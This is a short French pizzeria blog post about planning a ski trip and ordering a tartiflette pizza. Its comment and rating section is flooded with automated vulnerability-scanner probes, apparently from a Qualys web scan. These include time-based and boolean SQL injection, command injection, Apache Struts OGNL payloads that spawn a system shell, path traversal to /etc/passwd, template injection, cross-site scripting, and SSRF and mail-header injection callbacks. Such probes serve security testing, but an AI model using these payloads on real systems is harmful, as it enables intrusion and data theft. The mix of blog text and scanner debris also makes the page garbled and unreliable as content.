Publié par WebMaster, le 14 janvier 2020

Organisez une soirée 100% montagne

La saison hivernale est désormais bien installée… Pour fêtez ça, commandez des pizzas, chaussez vos skis (du moins, faites semblant !) et organisez une soirée 100% montage avec vos amis !

Chez vous comme au pied des pistes !

Les vacances arrivent à grand pas et vous avez décidé de partir skier avec vos amis ? Votre soirée est une bonne occasion de discuter de l’organisation de ces vacances ! Avant de dévaler les pistes, il y a une multitude d’étapes préalables à passer. Vous devez ensemble vous poser un certain nombre de questions primordiales : Quelles dates précisément ? Quelle station de ski ? Quel moyen de transport ? Qu’en est t-il du logement ? Quelles activités ? Qui ramène quoi ? Et plus encore...

Mêlez convivialité et sérieux

Il est parfois compliqué d’avancer sérieusement sur un projet lorsque l’on se retrouve dans une pièces remplie d’amis, il est assez simple de commencer à divaguer et se retrouver à rire et discuter à tout va… Ce n’est pas un problème ! Votre réunion entre amis doit se faire dans une bonne ambiance, vous n’êtes pas au travail, seulement, vous devez être un minimum sérieux et attentifs pour bien planifier vos vacances et être sûrs de ne rien oublier. Alors personne ne doit manquer à l’appel et toutes les questions doivent être étudiées. Chacun de vos amis doit donner le fruit de ses recherches, et n’oubliez pas de tout noter afin de ne rien oublier une fois la soirée terminée. Vous éviterez ainsi tous les éventuels problèmes d’organisation que vous pourriez rencontrer au futur.

Fêtez cela avec une délicieuse pizza montagnarde !

Une fois l’organisation de vos vacances terminée, place à la détente ! Vous pouvez monter le volume de la musique et commander de savoureuses pizzas à emporter. Pour vous projeter au ski, quoi de mieux qu’une pizza tartiflette ? Notre recette forte en goût vous transportera directement sur le haut des pistes. A base de sauce crémée, elle est composée de reblochon AOP, de pommes de terre, de bacon et d’oignons, c’est une pizza inspirée des traditions montagnardes, les fondus du fromage seront comblés !

 pizza-tartiflette_2

1336 Commentaires

Veuillez noter cet article ?
1
1
1
1
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(@DELAY_SECONDS@))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(@DELAY_SECONDS@))qsqli_3333); -- OR"*/
1';WAITFOR DELAY '00:00:29'--
1');WAITFOR DELAY '00:00:29'--
1',0,0);WAITFOR DELAY'00:00:29'--
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1;SELECT sleep(29); --
aaaa&ping -n 92 localhost&
ping -c2 -i91 localhost
|ping -c2 -i91 localhost
|ping -c2 -i91 localhost|
1WAITFOR DELAY '00:00:29'
1;WAITFOR DELAY '00:00:29';
1);WAITFOR DELAY '00:00:29'--
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1" or not(false()) or "true" = "true
1" or true() or "and" = "and
1' or not(false()) or 'true' = 'true
1 and false() and 'or' = 'and'
1" and false() and "or" = "and
1 or not(false()) or 'true' = 'true'
1' and 'tpklq'='xqlkp
11 or 11=12
1' or true() or 'and' = 'and
1') /* or klpry */oR ' aND ptqws'=' aND ptqws
1' /* or klpry */oR ' aND xqlkp'=' aND xqlkp
15 oR 9=8 + 1
1' and false() and 'or' = 'and
1 or true() or 'and' = 'and'
1 /* or klpry */oR 4325=1597 + 2728 -- aND 2729
1 oR 6248=2491 + 3757
1 and 7248 IS NULL
1') or 'swqtp'='swqtp
1' or 'tpklq'='tpklq
11 or 11=11
1 aND 7248=2491 + 4757
1') and 'swqtp'='ptqws
1 or NULL IS NULL
1' and 3789=1391 --
1') /* or klpry */oR 2634=1511 + 1123 -- aND 1124
1 and 4325=2728 --
1 or 6248 IS NULL
1 and NULL IS NULL
1' /* or klpry */oR 3789=2398 + 1391 -- aND 1390
1 or 4325=4325 --
1
1
1
1') or 2634=2634 --
1
1
1' or 3789=3789 --
1') and 2634=1123 --
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
(23.0231*213.759)
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
Joe bcc:was_engine@5f5044fd01c2e52905b3841a1401c2aa690482a0.37735603996903.2692665133.smtphi01.smtp.eu2.qualysperiscope.com.
http://4e92999a35771fb71509be27f50b450daab8e600.37735603996903.1038661013.ssrf01.ssrf.eu2.qualysperiscope.com.
../../../../../../../Windows/System32/drivers/etc/hosts
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
a(){}phpinfo(); function a
|netstat -an
http://rfitest/
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1e309
/../../../../../../../etc/passwd
/../../../../../../../etc/passwd
../../../../../../../etc/passwd
//..//..//..//..//..//..//..//etc/passwd
//....//....//....//....//....//....//....//etc/passwd
../../../../../../../Windows/System32/drivers/etc/hosts
1'
;--
#
/*
``
,
(
1
1
1
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
q Qualys_resp_hdr_injection: Vulnerable
q Qualys_resp_hdr_injection: Vulnerable
qualys<esi:comment text="" />was<!--esx-->esi
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1;SELECT sleep(29); --
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(@DELAY_SECONDS@))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(@DELAY_SECONDS@))qsqli_3333); -- OR"*/
1);WAITFOR DELAY '00:00:29'--
1;WAITFOR DELAY '00:00:29';
1';WAITFOR DELAY '00:00:29'--
1');WAITFOR DELAY '00:00:29'--
1',0,0);WAITFOR DELAY'00:00:29'--
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
aaaa&ping -n 92 localhost&
ping -c2 -i91 localhost
1
|ping -c2 -i91 localhost
1WAITFOR DELAY '00:00:29'
|ping -c2 -i91 localhost|
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
15 oR 9=8 + 1
1' and false() and 'or' = 'and
1" and false() and "or" = "and
1 and false() and 'or' = 'and'
1" or not(false()) or "true" = "true
1' or not(false()) or 'true' = 'true
1 or not(false()) or 'true' = 'true'
1' /* or klpry */oR ' aND xqlkp'=' aND xqlkp
11 or 11=12
1' or true() or 'and' = 'and
1 or true() or 'and' = 'and'
1" or true() or "and" = "and
1 oR 6248=2491 + 3757
1 and 7248 IS NULL
1') and 'swqtp'='ptqws
1' and 'tpklq'='xqlkp
1 aND 7248=2491 + 4757
11 or 11=11
1') /* or klpry */oR ' aND ptqws'=' aND ptqws
1') /* or klpry */oR 2634=1511 + 1123 -- aND 1124
1' /* or klpry */oR 3789=2398 + 1391 -- aND 1390
1 /* or klpry */oR 4325=1597 + 2728 -- aND 2729
1 or 6248 IS NULL
1 and NULL IS NULL
1') or 'swqtp'='swqtp
1' or 'tpklq'='tpklq
1' or 3789=3789 --
1 or 4325=4325 --
1
1') and 2634=1123 --
1' and 3789=1391 --
1 and 4325=2728 --
1 or NULL IS NULL
1
1
1
1
1
1') or 2634=2634 --
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
(23.0231*213.759)
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
Joe bcc:was_engine@0bb8dfd944f4ebe107156c42f5c59a2917a5552a.3564203_3996903.4266849924.smtphi01.smtp.eu2.qualysperiscope.com.
http://ed87e52f70b36ce7d14cce4606b361af85c2882c.3564203_3996903.1213395716.ssrf01.ssrf.eu2.qualysperiscope.com.
../../../../../../../Windows/System32/drivers/etc/hosts
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
a(){}phpinfo(); function a
|netstat -an
http://rfitest/
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1e309
/../../../../../../../etc/passwd
/../../../../../../../etc/passwd
../../../../../../../etc/passwd
//..//..//..//..//..//..//..//etc/passwd
../../../../../../../Windows/System32/drivers/etc/hosts
//....//....//....//....//....//....//....//etc/passwd
qualys<esi:comment text="" />was<!--esx-->esi
1'
;--
#
/*
``
(
,
1
1
1
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
q Qualys_resp_hdr_injection: Vulnerable
q Qualys_resp_hdr_injection: Vulnerable
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1
1
1
1
1;SELECT sleep(29); --
1
1
1
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1
1
1
1
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1
1
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1
1
1
1');WAITFOR DELAY '00:00:29'--
1
1
1
1
1
1
1
1';WAITFOR DELAY '00:00:29'--
1);WAITFOR DELAY '00:00:29'--
1
1
1
1
1
1;WAITFOR DELAY '00:00:29';
1
1
1
1
1
1
1
1
1
1
1WAITFOR DELAY '00:00:29'
1
1
|ping -c2 -i91 localhost|
1
1
1
1
1
1
|ping -c2 -i91 localhost
ping -c2 -i91 localhost
1
1
1
1
1
1
1
1
aaaa&ping -n 92 localhost&
1
1" and false() and "or" = "and
1
1" or not(false()) or "true" = "true
1
1
1
1
1" or true() or "and" = "and
1
1
1
1
1
1
1
1
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1
1
1
1
1 or true() or 'and' = 'and'
1
1
1
1
1
1
1
1
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1
1
1
1' or true() or 'and' = 'and
1
1
1
1
1
1
1
1
1
1
1
15 oR 9=8 + 1
1
1
1
1
11 or 11=12
1
1
1
1
1
11 or 11=11
1
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1
1') and 'swqtp'='ptqws
1
1
1
1
1') or 'swqtp'='swqtp
1
1
1
1
1
1
1
1
1 aND 7248=2491 + 4757
1
1
1
1
1 and 7248 IS NULL
1
1
1
1
1
1 and NULL IS NULL
1
1
1
1
1
1
1 oR 6248=2491 + 3757
1
1 or NULL IS NULL
1
1
1
1 or 6248 IS NULL
1
1
1
1
1
1
1
1
1
1
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1
1
1
1 and 4325=2728 --
1
1
1
1
1 or 4325=4325 --
1
1
1
1
1
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1
1
1' and 3789=1391 --
1
1
1
1
1
1' or 3789=3789 --
1
1
1
1
1
1
1
1
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1
1
1
1') and 2634=1123 --
1
1
1
1') or 2634=2634 --
1
1
1
1
1
1
1
1
1
http://0805514b934cde9cf107c5c750bb22ab4aba3e97.3564203_3996903.3280797935.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@42397f1f79ee5671ede12217472c3e0f00dcebc0.3564203_3996903.533971618.smtphi01.smtp.eu2.qualysperiscope.com.
1
1
1
1
1
1
</script><script>function(){qxss};</script>
1
1
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
1
1
1
1
(23.0231*213.759)
1
1
1
1
1
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
1
1
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
1
1
1
1
1
"-qxss()-"
1
1
1
1
'-qxss()-'
1
1
1
1
1
*/;(function(){qxss});/*
1
9 ;(function(){qxss});//
1
1
1
1
1
1
1
9;(function(){qxss});//
1
1
1
';(function(){qxss});/**/'
1
1
1
1
1
");(function(){qxss});/**/"
1
1
";(function(){qxss});/**/"
1
1
javascript:qxss(X170864132Y5_2Z);
1
1
1
1
1
http://rfitest/
1
1
1
1
1
1
|netstat -an
1
1
1
1
1
a(){}phpinfo(); function a
1
1
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
1
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
1
1
1
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
1
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
1
1
1
1
1
1
//....//....//....//....//....//....//....//etc/passwd
1
1
//..//..//..//..//..//..//..//etc/passwd
1
1
../../../../../../../etc/passwd
1
1
1
1
/../../../../../../../etc/passwd
1
1
1
1
/../../../../../../../etc/passwd
1
1
1
1
1
1
1
1
1e309
1
1
1
1
1
1
1
(
1
1
1
1
,
1
``
1
1
1
1
1
1
1
/*
1
#
1
1
1
1
1
1
;--
1
1
1
1
1
1
1
1
1
1'
1
1
1
qualys<esi:comment text="" />was<!--esx-->esi
1
q Qualys_resp_hdr_injection: Vulnerable
1
1
1
1
1
1
q Qualys_resp_hdr_injection: Vulnerable
1
1
1
1
1
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
1
1
<script src=http://localhost/j
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
1
< script a=4>qss=7< /script>
1
1
1
1
1
1
" onEvent=X170864132Y5_2Z
1
1
1
1
1
1
1
' onEvent=X170864132Y5_2Z
1
1